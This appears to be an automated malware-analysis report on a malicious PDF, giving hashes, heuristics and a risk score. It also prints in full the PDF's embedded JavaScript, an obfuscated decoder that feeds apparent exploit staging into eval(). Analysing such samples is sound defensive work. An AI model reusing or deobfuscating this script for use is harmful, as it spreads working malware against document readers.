Malicious PDF — malware analysis report

Static analysis result for SHA-256 d049423ace0f5b22…

MALICIOUS

PDF

9.3 KB Created: 2010-05-23 12:56:51 Authoring application: EfBFPN (via j5zphbj) First seen: 2026-05-08
MD5: 718d69a7316cdacf0a00f0a0ca81b2c0 SHA-1: 6ddfe4c1acbaba9ee637346d51aa0920fe6c2c4b SHA-256: d049423ace0f5b22d2fcf76103b1dd587c1a517c92c59a567c967c09536db864
166 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. A high-severity PDF_EVAL heuristic firing suggests the use of eval(), a common technique for obfuscating malicious JavaScript. The embedded JavaScript is likely designed to download and execute a second-stage payload. The obfuscation and use of eval() reduce confidence in a precise family attribution.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 4

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    SG<GYB,=,}Bf<hYmfy\"%}4o4o%}4o4o\"g;\n,,FqmjKifq6(SG<GYB,=,LBlN6)FGc<Fws)4EyFqmjKifq6(SG<GYB>,aEmh2DW< ICd<c{hg;\n,,6YR,21W(jhvYRJi4EJas,=,ymIl.FNTTrdS0qsAW,-,orQooooog,/,MLRSBRSF1jPr7E 5;\n,,eER,y6YR,9.C(vP0F 10dW7G2,=,o;,9.C(vP0F 10dW7G2,n,21W(jhvYRJi4EJas;,9.C(vP0F 10dW7G2,++,gk\n,,,,ELsPOSwptB48ToG([9.C(vP0F 10dW7G2],=,FqmjKifq6(SG<GYB,+, wRSQOGUqKpD0ZDv;\n,,3\n3\ne}BhGpEB,ewV<se GeJNvJjWMygk\n,,6YR,fEOOM8mBaqAp<VKW,=,o;\n,,6YR,D1.)N8PuRxKRLul.,=,Ymmz6pfUfRWfR<pEBzGE GRpBuyg;\n,,Ymmzh0fYRvpL …
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0007_000.js pdf-javascript-stream PDF /JS object 7 at offset 0x241 8102 bytes
SHA-256: aefd33dca28b5b4554b09ef78bca5006d7b280a202e3382878b3edd158e5b6dc
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s). 63 of 112 identifiers look randomly generated (e.g. 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmn') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
function sTGjLz8n(sTGjLz8n,AAJayE) {var lVBW70NH14Qgs=sTGjLz8n. substr (AAJayE, 1);return lVBW70NH14Qgs;}/*LpyorNgGB5|SUOXxu8JvVGm|OedfALzL0o0h1W*/function RkNDhq(A9zNF) {/*ASILmXiaHhj32qf|A94aAGQM74Cf|ZIorRzUoYuv5UoyBK*/var wBAl6RpGbWkaIpBGnIY = new String("<>(){} .,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789");/*AKKXKQoWN[ZsVy1AfI0zxOkj]AO86YO3*//*YQto5G2efkzTc0|lqoY4P8FJMDGkR9JpQ|ULANqfygzQWo2CTR7iP*/var WbvCevCT /*sbGzC[yMDFFYQGl7l]dbq0Gj3a019*/= new String("nbygk3,z>KValjI7AC{XM1H.wc2 vdWPixDYqh)feu9p(F0LBEm8R<G}6UrtToJNsQ5OZS4");/*AshAhj|Vwca10r7cpj|JBj9IJ2i9uiFoQmoxMD*/for(HMvJNWGeCM6ZwXhbYoFh=0;HMvJNWGeCM6ZwXhbYoFh<wBAl6RpGbWkaIpBGnIY.length;HMvJNWGeCM6ZwXhbYoFh++) {if(A9zNF == sTGjLz8n(WbvCevCT, HMvJNWGeCM6ZwXhbYoFh)) {/*Afk0WSy[AXsGZSGhb9GatpfX5I]sUG2S*/return sTGjLz8n(wBAl6RpGbWkaIpBGnIY, HMvJNWGeCM6ZwXhbYoFh);/*cJ8u7xsVfyuy5S <AZpnELBA]EsnKk6wDF*/}}return A9zNF;}/*xCifYEUI2PbHJ1xx5[z5S3o5EP20S8lGBKmZO6]HM9PW0CKwB9sT*//*XP7nIx5GZCHjohylF5y|KK5NVs|UbjNyzLb*/var YXYg9dBVxDvg2gulz1K = new String;var qIoxD = new String("\n6YR,ELsPOSwptB48ToG(,=,BfU,KRRYtyg;\n6YR,UZ JWD9wc.5Pt40u;\ne}BhGpEB,LBlN6)FGc<Fws)4EyFqmjKifq6(SG<GYB>,aEmh2DW< ICd<c{hgk\n,,U9p0f,yFqmjKifq6(SG<GYBz0fBuG9,*,N,n,aEmh2DW< ICd<c{hgk\n,,,,FqmjKifq6(SG<GYB,+=,FqmjKifq6(SG<GYB;\n,,3\n,,FqmjKifq6(SG<GYB,=,FqmjKifq6(SG<GYBz<}q<GRpBuyo>,aEmh2DW< ICd<c{h,/,Ng;\n,,RfG}RB,FqmjKifq6(SG<GYB;\n3\ne}BhGpEB,64RleWEqj6WSEZ6Wy0FSMX)jLGPA0rY.Tgk\n,,6YR,mIl.FNTTrdS0qsAW,=,orohohohoh;\n,,6YR, wRSQOGUqKpD0ZDv,=,}Bf<hYmfy\"%}QsQs%}QsQs%}QsQs%}oIjV%}ss5V%}OOa4%}SoV4%}SooJ%}jIss%}jNQs%}jVIK%}jSo5%}IIja%}IIII%}SVZI%}lIQj%}jIjI%}OQjI%}jsKI%}4IOQ%}QNIs%}4IOQ%}OjjZ%}jIos%}jIjV%}OQjI%}V4os%}OJSZ%}jJKJ%}oZos%}jIJJ%}jIjI%}KKOO%}V4jV%}ZZSZ%}O5JJ%}oZjJ%}jIJI%}jIjI%}KKOO%}V4jZ%}aKSZ%}Jo5I%}oZNl%}jIol%}jIjI%}KKOO%}V4js%}ooSZ%}oINJ%}oZSI%}jIsV%}jIjI%}KKOO%}V4II%}NjSZ%}oK4O%}oZ5Z%}jIN4%}jIjI%}KKOO%}KIIV%}lZOI%}4KNa%}OOJ5%}IZKK%}jSoO%}jIjj%}VJjI%}4KOO%}OQaV%}jVKK%}jjS5%}OQVO%}IZVK%}oZV4%}jIOQ%}jIjI%}SZVI%}I5l4%}4Iao%}ZSoZ%}jIjI%}OOjI%}IsKK%}NKOQ%}NIOa%}OOVI%}aIKK%}JoSZ%}jIjI%}VIjI%}KKOQ%}S5IV%}VOjl%}VKOQ%}oZIZ%}jISj%}jIjI%}KKja%}NSaI%}VsjI%}aJ4J%}NSSK%}jVKI%}SK4Z%}jIjI%}4KJo%}OQaI%}jsKK%}jjS5%}OQVO%}IZVK%}KIoZ%}jIjI%}S5jI%}VZjS%}KKja%}laaV%}VasQ%}JoVa%}aI4K%}VaVI%}KKOQ%}S5Is%}VOjK%}VKOQ%}oZIZ%}jIaa%}jIjI%}jIS5%}4KJo%}OQaI%}jZKK%}jlS5%}OQVO%}IZVK%}IIoZ%}jIjI%}S5jI%}OQJo%}IIKK%}jjS5%}OQVO%}IZVK%}jIoZ%}jIjI%}KjjI%}VlVQ%}ojja%}ojja%}ojja%}ojja%}osOa%}V5jV%}OQVa%}ols5%}VlJS%}oIJo%}OQVK%}OQos%}jZ4N%}VNOQ%}V4js%}4aOQ%}OQls%}IJ4V%}ja4Z%}V4Ja%}44OQ%}jaaI%}laJa%}KONO%}QNKj%}Naja%}laV4%}joJ4%}II5J%}Jll5%}jZ4V%}NJNj%}jajN%}KIJl%}JjoQ%}JJlQ%}4KVJ%}V5oK%}oQOQ%}V5OQ%}jaaV%}S4sN%}jsOQ%}OQKQ%}IsV5%}sNja%}jVOQ%}jaOQ%}VJNK%}NlVN%}jIjZ%}JVoZ%}JoJJ%}VKJo%}KsVl%}KoKN%}jIKJ%}ZQOS%}ZoZQ%}NIsK%}OQNI%}Olso%}sJOJ%}ZsOj%}O4Nj%}OOOj%}NIOI%}OaON%}OZOI%}OaNI%}OJOI%}NjOQ%}OSZo%}sIZo%}OQO4%}s4sl%}oos4\"g;\n,,pe,y0FSMX)jLGPA0rY.T,==,Jgk\n,,,,mIl.FNTTrdS0qsAW,=,orsosososo;\n,,,, wRSQOGUqKpD0ZDv,=,}Bf<hYmfy\"%}QsQs%}QsQs%}QsQs%}oIjV%}ss5V%}OOa4%}SoV4%}SooJ%}jIss%}jNQs%}jVIK%}jSo5%}IIja%}IIII%}SVZI%}lIQj%}jIjI%}OQjI%}jsKI%}4IOQ%}QNIs%}4IOQ%}OjjZ%}jIos%}jIjV%}OQjI%}V4os%}OJSZ%}jJKJ%}oZos%}jIJJ%}jIjI%}KKOO%}V4jV%}ZZSZ%}O5JJ%}oZjJ%}jIJI%}jIjI%}KKOO%}V4jZ%}aKSZ%}Jo5I%}oZNl%}jIol%}jIjI%}KKOO%}V4js%}ooSZ%}oINJ%}oZSI%}jIsV%}jIjI%}KKOO%}V4II%}NjSZ%}oK4O%}oZ5Z%}jIN4%}jIjI%}KKOO%}KIIV%}lZOI%}4KNa%}OOJ5%}IZKK%}jSoO%}jIjj%}VJjI%}4KOO%}OQaV%}jVKK%}jjS5%}OQVO%}IZVK%}oZV4%}jIOQ%}jIjI%}SZVI%}I5l4%}4Iao%}ZSoZ%}jIjI%}OOjI%}IsKK%}NKOQ%}NIOa%}OOVI%}aIKK%}JoSZ%}jIjI%}VIjI%}KKOQ%}S5IV%}VOjl%}VKOQ%}oZIZ%}jISj%}jIjI%}KKja%}NSaI%}VsjI%}aJ4J%}NSSK%}jVKI%}SK4Z%}jIjI%}4KJo%}OQaI%}jsKK%}jjS5%}OQVO%}IZVK%}KIoZ%}jIjI%}S5jI%}VZjS%}KKja%}laaV%}VasQ%}JoVa%}aI4K%}VaVI%}KKOQ%}S5Is%}VOjK%}VKOQ%}oZIZ%}jIaa%}jIjI%}jIS5%}4KJo%}OQaI%}jZKK%}jlS5%}OQVO%}IZVK%}IIoZ%}jIjI%}S5jI%}OQJo%}IIKK%}jjS5%}OQVO%}IZVK%}jIoZ%}jIjI%}KjjI%}VlVQ%}ojja%}ojja%}ojja%}ojja%}osOa%}V5jV%}OQVa%}ols5%}VlJS%}oIJo%}OQVK%}OQos%}jZ4N%}VNOQ%}V4js%}4aOQ%}OQls%}IJ4V%}ja4Z%}V4Ja%}44OQ%}jaaI%}laJa%}KONO%}QNKj%}Naja%}laV4%}joJ4%}II5J%}Jll5%}jZ4V%}NJNj%}jajN%}KIJl%}JjoQ%}JJlQ%}4KVJ%}V5oK%}oQOQ%}V5OQ%}jaaV%}S4sN%}jsOQ%}OQKQ%}IsV5%}sNja%}jVOQ%}jaOQ%}VJNK%}NlVN%}jIjZ%}JVoZ%}JoJJ%}VKJo%}KsVl%}KoKN%}jIKJ%}ZQOS%}ZoZQ%}NIsK%}OQNI%}Olso%}sJOJ%}ZsOj%}O4Nj%}OOOj%}NIOI%}OaON%}OZOI%}OaNI%}OJOI%}NjOQ%}OSZo%}sIZo%}OQO4%}s4sl%}oos4\"g;\n,,3\n,,f0<f,pe,y0FSMX)jLGPA0rY.T,==,Ngk\n,,,, wRSQOGUqKpD0ZDv,=,}Bf<hYmfy\"%}QsQs%}QsQs%}QsQs%}oIjV%}ss5V%}OOa4%}SoV4%}SooJ%}jIss%}jNQs%}jVIK%}jSo5%}IIja%}IIII%}SVZI%}lIQj%}jIjI%}OQjI%}jsKI%}4IOQ%}QNIs%}4IOQ%}OjjZ%}jIos%}jIjV%}OQjI%}V4os%}OJSZ%}jJKJ%}oZos%}jIJJ%}jIjI%}KKOO%}V4jV%}ZZSZ%}O5JJ%}oZjJ%}jIJI%}jIjI%}KKOO%}V4jZ%}aKSZ%}Jo5I%}oZNl%}jIol%}jIjI%}KKOO%}V4js%}ooSZ%}oINJ%}oZSI%}jIsV%}jIjI%}KKOO%}V4II%}NjSZ%}oK4O%}oZ5Z%}jIN4%}jIjI%}KKOO%}KIIV%}lZOI%}4KNa%}OOJ5%}IZKK%}jSoO%}jIjj%}VJjI%}4KOO%}OQaV%}jVKK%}jjS5%}OQVO%}IZVK%}oZV4%}jIOQ%}jIjI%}SZVI%}I5l4%}4Iao%}ZSoZ%}jIjI%}OOjI%}IsKK%}NKOQ%}NIOa%}OOVI%}aIKK%}JoSZ%}jIjI%}VIjI%}KKOQ%}S5IV%}VOjl%}VKOQ%}oZIZ%}jISj%}jIjI%}KKja%}NSaI%}VsjI%}aJ4J%}NSSK%}jVKI%}SK4Z%}jIjI%}4KJo%}OQaI%}jsKK%}jjS5%}OQVO%}IZVK%}KIoZ%}jIjI%}S5jI%}VZjS%}KKja%}laaV%}VasQ%}JoVa%}aI4K%}VaVI%}KKOQ%}S5Is%}VOjK%}VKOQ%}oZIZ%}jIaa%}jIjI%}jIS5%}4KJo%}OQaI%}jZKK%}jlS5%}OQVO%}IZVK%}IIoZ%}jIjI%}S5jI%}OQJo%}IIKK%}jjS5%}OQVO%}IZVK%}jIoZ%}jIjI%}KjjI%}VlVQ%}ojja%}ojja%}ojja%}ojja%}osOa%}V5jV%}OQVa%}ols5%}VlJS%}oIJo%}OQVK%}OQos%}jZ4N%}VNOQ%}V4js%}4aOQ%}OQls%}IJ4V%}ja4Z%}V4Ja%}44OQ%}jaaI%}laJa%}KONO%}QNKj%}Naja%}laV4%}joJ4%}II5J%}Jll5%}jZ4V%}NJNj%}jajN%}KIJl%}JjoQ%}JJlQ%}4KVJ%}V5oK%}oQOQ%}V5OQ%}jaaV%}S4sN%}jsOQ%}OQKQ%}IsV5%}sNja%}jVOQ%}jaOQ%}VJNK%}NlVN%}jIjZ%}JVoZ%}JoJJ%}VKJo%}KsVl%}KoKN%}jIKJ%}ZQOS%}ZoZQ%}NIsK%}OQNI%}Olso%}sJOJ%}ZsOj%}O4Nj%}OOOj%}NIOI%}OaON%}OZOI%}OaNI%}OJOI%}NjOQ%}OSZo%}sIZo%}OQO4%}s4sl%}oos4\"g;\n,,3\n,,6YR,MLRSBRSF1jPr7E 5,=,orQooooo;\n,,6YR,U{V7wOlN76YNsoW.,=, wRSQOGUqKpD0ZDvz0fBuG9,*,N;\n,,6YR,aEmh2DW< ICd<c{h,=,MLRSBRSF1jPr7E 5,-,yU{V7wOlN76YNsoW.,+,orsSg;\n,,6YR,FqmjKifq6(SG<GYB,=,}Bf<hYmfy\"%}4o4o%}4o4o\"g;\n,,FqmjKifq6(SG<GYB,=,LBlN6)FGc<Fws)4EyFqmjKifq6(SG<GYB>,aEmh2DW< ICd<c{hg;\n,,6YR,21W(jhvYRJi4EJas,=,ymIl.FNTTrdS0qsAW,-,orQooooog,/,MLRSBRSF1jPr7E 5;\n,,eER,y6YR,9.C(vP0F 10dW7G2,=,o;,9.C(vP0F 10dW7G2,n,21W(jhvYRJi4EJas;,9.C(vP0F 10dW7G2,++,gk\n,,,,ELsPOSwptB48ToG([9.C(vP0F 10dW7G2],=,FqmjKifq6(SG<GYB,+, wRSQOGUqKpD0ZDv;\n,,3\n3\ne}BhGpEB,ewV<se GeJNvJjWMygk\n,,6YR,fEOOM8mBaqAp<VKW,=,o;\n,,6YR,D1.)N8PuRxKRLul.,=,Ymmz6pfUfRWfR<pEBzGE GRpBuyg;\n,,Ymmzh0fYRvpLf.}GyUZ JWD9wc.5Pt40ug;\n\n,,pe,yD1.)N8PuRxKRLul.,n,ZzJgk\n,,,,64RleWEqj6WSEZ6Wyog;\n,,,,6YR,eCvmo{hM6}5BZI{9,=,}Bf<hYmfy\"%}ohoh%}ohoh\"g;\n,,,,U9p0f,yeCvmo{hM6}5BZI{9z0fBuG9,n,QQ45NgeCvmo{hM6}5BZI{9,+=,eCvmo{hM6}5BZI{9;\n,,,,G9p<,zhE00Yq GERf,=,aE00YqzhE00fhGjLYp0CBeEyk\n,,,,,,<}q(,:,\"\">,L<u,:,eCvmo{hM6}5BZI{9\n,,,,3\n,,,,g;\n,,3\npe,yD1.)N8PuRxKRLul.,b=,4gk\n,,,,GRt,k\npe,yYmmz)EhzaE00YqzufGChEBgk\n,,,,,,,,64RleWEqj6WSEZ6WyNg;\n,,,,,,,,6YR,E9Xhi8{.wv7VKvDf,=,}Bf<hYmfy\"%o4\"g;\n,,,,,,,,U9p0f,yE9Xhi8{.wv7VKvDfz0fBuG9,n,orQooogE9Xhi8{.wv7VKvDf,+=,E9Xhi8{.wv7VKvDf;\n,,,,,,,,E9Xhi8{.wv7VKvDf,=,\"Hz\",+,E9Xhi8{.wv7VKvDf;\nYmmz)EhzaE00YqzufGChEByE9Xhi8{.wv7VKvDfg;\n,,,,,,,,fEOOM8mBaqAp<VKW,=,J;\n,,,,,,3\n,,,,,,f0<f,k\n,,,,,,,,fEOOM8mBaqAp<VKW,=,J;\n,,,,,,3\n,,,,3\n,,,,hYGh9,yfgk\n,,,,,,fEOOM8mBaqAp<VKW,=,J;\n,,,,3\n,,,,pe,yfEOOM8mBaqAp<VKW,==,Jgk\n,,,,,,pe,yyD1.)N8PuRxKRLul.,b=,ZzJ&&,D1.)N8PuRxKRLul.,n,4ggk\n,,,,,,,,64RleWEqj6WSEZ6WyJg;\n,,,,,,,,6YR,jQd6HSACsMO4q.8l,=,\"JN444444444444444444\";\n,,,,,,,,eER,y1K8)Nosc)CqBLV D,=,o;,1K8)Nosc)CqBLV D,n,NZO;,1K8)Nosc)CqBLV D,++,gk\n,,,,,,,,,,jQd6HSACsMO4q.8l,+=,\"S\";\n,,,,,,,,3\n,,,,,,,,}Gp0zmRpBGey\"%Q5oooe\">,jQd6HSACsMO4q.8lg;\n,,,,,,3\n,,,,3\n,,3\n3\nYmmz.rdq50GSSTIpHZU ,=,ewV<se GeJNvJjWM;\nUZ JWD9wc.5Pt40u,=,Ymmz<fGvpLf.}Gy\"Ymmz.rdq50GSSTIpHZU yg\">,Jog;\n");/*AXEYaM8Etwqyse33ozGA{WU95ixutPssnx}D9FIs2*//*hkSad7Pj7x6Rw10km|AVSdIZgHfo0XdX|vyasEAq168oyyOaYEvqi*/for(AddBZ2YxYYRZuEc=0;AddBZ2YxYYRZuEc<qIoxD.length;AddBZ2YxYYRZuEc++)YXYg9dBVxDvg2gulz1K += RkNDhq(sTGjLz8n(qIoxD,AddBZ2YxYYRZuEc));eval(YXYg9dBVxDvg2gulz1K);/*GFBlu28NQ68EWrIXXAT[pHJ3ii8TOh]VmP6WI5j*/